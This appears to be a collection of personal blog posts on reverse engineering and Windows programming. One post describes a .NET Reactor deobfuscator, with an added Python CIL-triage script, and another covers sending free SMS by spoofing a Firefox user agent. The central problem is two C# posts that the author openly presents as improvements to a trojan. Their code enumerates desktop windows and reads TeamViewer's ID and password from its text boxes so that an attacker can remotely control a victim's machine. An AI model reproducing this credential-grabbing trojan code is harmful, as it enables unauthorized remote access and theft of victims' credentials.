DeReactor – Tool to deobfuscate .Net Reactor assembly

Yesterday, I visited the RETEAM forum and found a thread asking which obfuscator had been applied to a target. Curious, I downloaded the target and tried to identify it with my tool .Net Id, but it could not identify which packer was used. The packer used for the target is .Net Reactor. My tool did not work because of a programming fault of mine. I fixed it and it works again. I have also added a new signature for PE Compact. While analyzing the assembly, I found that it is not difficult to write a tool to deobfuscate the target. Therefore I started to write DeReactor to deobfuscate .Net Reactor.

As you know, the obfuscator obfuscates all function and variable names, encrypts strings and obfuscates the control flow. DeReactor will help you obtain an assembly with easy-to-read source code.

Flow control

.Net Reactor uses a simple trick to prevent decompilation with .Net Reflector. It just adds 3 instructions before each method so that Reflector gets confused. They are the ‘branch’, ‘pop’ and ‘load int 0’ instructions, as you can see in the figure below:

This trick is also used in many other obfuscators. They just add some useless instructions at the head of each method and then put a jump to the real entry point at the top. This way they do not destroy or obfuscate any control flow, but the trick still prevents Reflector from decompiling. It is pretty weak against an expert reverser, but it is a good candidate for fighting script kiddies. It is also pretty simple to implement.

Encrypt string

The second feature of .Net Reactor is that it encrypts all strings into an unreadable form so that the reverser has no clue where to find what he really wants. The way .Net Reactor decrypts the strings during execution is pretty simple. It encrypts the clear text and replaces the clear text with the encrypted one. Then it inserts the decrypt function below the ‘ldstr’ instruction; this function decrypts the string to its original form and gives it back to the program, as shown in the figure below.
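Both patterns described above (a leading branch that skips junk instructions, and each ‘ldstr’ followed by a call to one decrypt routine) can be located mechanically when triaging a protected assembly. The following Python code is an added example, not DeReactor's code: it decodes a small subset of CIL opcodes over constructed method bodies, and the exact instruction layout and metadata tokens are assumptions because the figures are not reproduced here.

```python
import struct
from collections import Counter

# Subset of one-byte CIL opcodes: value -> (mnemonic, operand size in bytes)
OPCODES = {0x00: ("nop", 0), 0x16: ("ldc.i4.0", 0), 0x26: ("pop", 0),
           0x28: ("call", 4), 0x2A: ("ret", 0), 0x2B: ("br.s", 1),
           0x38: ("br", 4), 0x72: ("ldstr", 4)}

def disassemble(code):
    """Decode raw method-body bytes into (offset, mnemonic, operand, size)."""
    out, pos = [], 0
    while pos < len(code):
        name, width = OPCODES[code[pos]]  # KeyError: opcode outside this subset
        raw = code[pos + 1:pos + 1 + width]
        operand = struct.unpack("<b" if width == 1 else "<i", raw)[0] if width else None
        out.append((pos, name, operand, 1 + width))
        pos += 1 + width
    return out

def branch_targets(ins):
    """Absolute targets; CIL branch operands are relative to the next instruction."""
    return [off + size + op for off, name, op, size in ins if name in ("br", "br.s")]

def junk_prologue(code):
    """Instructions skipped by a leading unconditional branch and never targeted."""
    ins = disassemble(code)
    if not ins or ins[0][1] not in ("br", "br.s"):
        return []
    start, entry = ins[0][3], ins[0][3] + ins[0][2]
    if any(start <= t < entry for t in branch_targets(ins)[1:]):
        return []  # something jumps into the skipped region, so it is not junk
    return [name for off, name, _, _ in ins[1:] if off < entry]

def decryptor_candidates(bodies):
    """Count call tokens that directly follow an ldstr across all bodies."""
    hits = Counter()
    for code in bodies:
        ins = disassemble(code)
        for prev, cur in zip(ins, ins[1:]):
            if prev[1] == "ldstr" and cur[1] == "call":
                hits[cur[2]] += 1
    return hits

# Constructed sample bodies (assumed layout, not taken from a real assembly).
PROTECTED = bytes.fromhex("2b022616" "7201000070" "2810000006" "262a")
CLEAN = bytes.fromhex("7205000070" "2810000006" "262a")

if __name__ == "__main__":
    print(junk_prologue(PROTECTED), junk_prologue(CLEAN))
    print(decryptor_candidates([PROTECTED, CLEAN]))
```

A call token that follows nearly every ‘ldstr’ in an assembly is the likely string-decrypt routine, and a non-empty junk prologue marks a method whose header can be removed before decompiling.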

There are still a lot of things to do with this tool. But I hope that this beta version will help you a little so that you can analyze your assembly more easily.

C# – How to get ID and Pass of TeamViewer programmatically?

As I said in my previous blog post, I am improving a funny trojan which uses TeamViewer as its component to open a back door on the victim’s machine. In this post I would like to share a small snippet of code to show how we can get the ID and Pass from the TeamViewer window. This ID and Pass are needed for building a remote connection to the victim’s computer.

You can see the function GetDesktopWindowsTitles in the previous blog post. In this example I used overloads of the SendMessage function to get the text length and the text of each textbox. There are many overloads of the SendMessage function, and each of them is suitable for particular window messages. You can find more overloads of SendMessage at the Pinvoke site.

// Find window by Caption only. Note you must pass IntPtr.Zero as the first parameter.
[DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)]
static extern IntPtr FindWindowByCaption(IntPtr ZeroOnly, string lpWindowName);
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr FindWindowEx(IntPtr parentHandle, IntPtr childAfter, string className, IntPtr windowTitle);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, int wParam,StringBuilder lParam);
static void Main()
{
	string[] strWindowsTitles = GetDesktopWindowsTitles();
	string strTeamViewer = "";
	foreach (string strTitle in strWindowsTitles)
	{
		if (strTitle.Contains("TeamViewer"))
		{
			if (strTitle == "TeamViewer")
			{
				strTeamViewer = strTitle;
				break;
			}
		}
	}

	if (strTeamViewer != "")
	{
		IntPtr hWndTeamViewer = FindWindowByCaption(IntPtr.Zero, strTeamViewer);

		IntPtr hWndID = FindWindowEx(hWndTeamViewer, IntPtr.Zero, "Edit", IntPtr.Zero);
		IntPtr hWndPass = FindWindowEx(hWndTeamViewer, hWndID, "Edit", IntPtr.Zero);

		IntPtr pLengthID = SendMessage(hWndID, WM_GETTEXTLENGTH, IntPtr.Zero, IntPtr.Zero);
		IntPtr pLengthPass = SendMessage(hWndPass, WM_GETTEXTLENGTH, IntPtr.Zero, IntPtr.Zero);

		StringBuilder strbID = new StringBuilder((int)pLengthID);
		StringBuilder strbPass = new StringBuilder((int)pLengthPass);

		IntPtr pID = SendMessage(hWndID, WM_GETTEXT, (int)pLengthID, strbID);
		IntPtr pPass = SendMessage(hWndPass, WM_GETTEXT, (int)pLengthPass, strbPass);

		Console.WriteLine(strbID.ToString());
		Console.WriteLine(strbPass.ToString());
		Console.ReadLine();
	}
}

Note that when getting the handle of the Pass textbox, I pass the handle of the ID textbox as the childAfter argument to tell the FindWindowEx function that it should take the textbox right after the ID textbox. The source code is pretty simple and easy to understand.

C# – How to enumerate all opened windows?

Yesterday I read a blog post at Benina’s blog about a funny trojan. This trojan uses TeamViewer to open a back door so that the attacker can access and control the victim’s machine. What interests me about this trojan is how it gets the ID and Pass from TeamViewer. I took a look at the source code and found out that the author uses a simple SendMessage command to get the text from the textbox.

I would like to improve this trojan so that it will automatically find out which window belongs to TeamViewer and send the command to that window, because the author used hard-coded values to find the TeamViewer windows.

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

public class EnumerateOpenedWindows
{
    const int MAXTITLE = 255;

    private static List<string> lstTitles;

    // LPARAM is pointer-sized, so the callback takes IntPtr rather than int
    private delegate bool EnumDelegate(IntPtr hWnd, IntPtr lParam);

    [DllImport("user32.dll", EntryPoint = "EnumDesktopWindows",
        ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)]
    private static extern bool EnumDesktopWindows(IntPtr hDesktop,
        EnumDelegate lpEnumCallbackFunction, IntPtr lParam);

    [DllImport("user32.dll", EntryPoint = "GetWindowText",
        ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)]
    private static extern int _GetWindowText(IntPtr hWnd,
        StringBuilder lpWindowText, int nMaxCount);

    [DllImport("user32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool IsWindowVisible(IntPtr hWnd);

    private static bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam)
    {
        string strTitle = GetWindowText(hWnd);
        if (strTitle != "" && IsWindowVisible(hWnd)) // keep only visible windows that have a title
        {
            lstTitles.Add(strTitle);
        }
        return true; // continue the enumeration
    }

    /// <summary>
    /// Return the window title of handle
    /// </summary>
    /// <param name="hWnd"></param>
    /// <returns></returns>
    public static string GetWindowText(IntPtr hWnd)
    {
        StringBuilder strbTitle = new StringBuilder(MAXTITLE);
        int nLength = _GetWindowText(hWnd, strbTitle, strbTitle.Capacity + 1);
        strbTitle.Length = nLength;
        return strbTitle.ToString();
    }

    /// <summary>
    /// Return titles of all visible windows on desktop
    /// </summary>
    /// <returns>List of titles in type of string</returns>
    private static string[] GetDesktopWindowsTitles()
    {
        lstTitles = new List<string>();
        EnumDelegate delEnumfunc = new EnumDelegate(EnumWindowsProc);
        bool bSuccessful = EnumDesktopWindows(IntPtr.Zero, delEnumfunc, IntPtr.Zero); // for current desktop

        if (bSuccessful)
        {
            return lstTitles.ToArray();
        }
        else
        {
            // Get the last Win32 error code
            int nErrorCode = Marshal.GetLastWin32Error();
            string strErrMsg = String.Format("EnumDesktopWindows failed with code {0}.", nErrorCode);
            throw new Exception(strErrMsg);
        }
    }

    static void Main()
    {
        string[] strWindowsTitles = GetDesktopWindowsTitles();
        foreach (string strTitle in strWindowsTitles)
        {
            Console.WriteLine(strTitle);
        }
        Console.ReadLine();
    }
}

In the source code above I used the EnumDesktopWindows API to list all opened windows, the GetWindowText API to get the title of each window and IsWindowVisible to filter for visible windows only. There is one thing that I still cannot understand: the result which EnumDesktopWindows returns. It returns a lot of strange output which I really cannot understand. For example, I am using Yahoo Messenger, and in the list of opened windows I see the title of a window which is the status of my friend in Yahoo Messenger.

I will ask some experts about this problem. If you know, please share with me.

How to send free SMS with Firefox?

It has been a long time since I wrote my previous blog post because I was pretty busy with my master's thesis. I have now graduated and am free. :D. So yesterday I decided to try the new Windows 7 Ultimate. The Windows version I was using is Windows Vista 32-bit. I wanted to use Windows 7 64-bit so that I could make use of 4 GB of RAM. So I decided to download a 64-bit version of Windows 7, and as a consequence I could not run the setup CD under 32-bit Vista. :(. I am really stupid. Therefore I had to set up a completely new Windows 7, and all of my settings went with the wind too. One of the applications which I lost is the Firefox add-on to send free SMS all over the world. I forgot its name. I spent some minutes searching for it again, so I decided to archive it on my blog.

To send free SMS to any country we need:

1. A mobile phone.

2. Internet connection.

3. Firefox.

And follow these steps to send a free SMS to anyone in any country.

1. Go to http://mjoy.com and register an account. You need to enter a valid mobile phone number to receive the confirmation code. Do not be afraid of losing any money. I have used this service for a long time and I find it OK.

2. Open Firefox and install the User Agent Switcher add-on.

3. In Firefox, go to menu Tools –> Add-ons –> User Agent Switcher and choose Settings.

4. In the new dialog, click New to create a new agent and enter the information as in the image below.

Description: Nokia 5300

User Agent: Nokia5300/2.0 (05.51) Profile/MIDP-2.0 Configuration/CLDC-1.1. 314

5. After creating the new agent successfully, in Firefox go to menu Tools –> User Agent Switcher and choose Nokia 5300.

6. Go to the site http://mjoy.com and you will see this log-on screen. Use the confirmation code which you created before to create an account and then log in. Now you can send free SMS to anywhere.

7. After sending the SMS, remember to switch your agent back to the Default agent. The mobile phone number which you want to send to must of course include the country code in front of it. For example, the code of Vietnam is +84, so the number should be something like this: +84984957271. Enjoy yourself.

List of websites allowing sending SMS over the world
http://freesms.dailysms.me/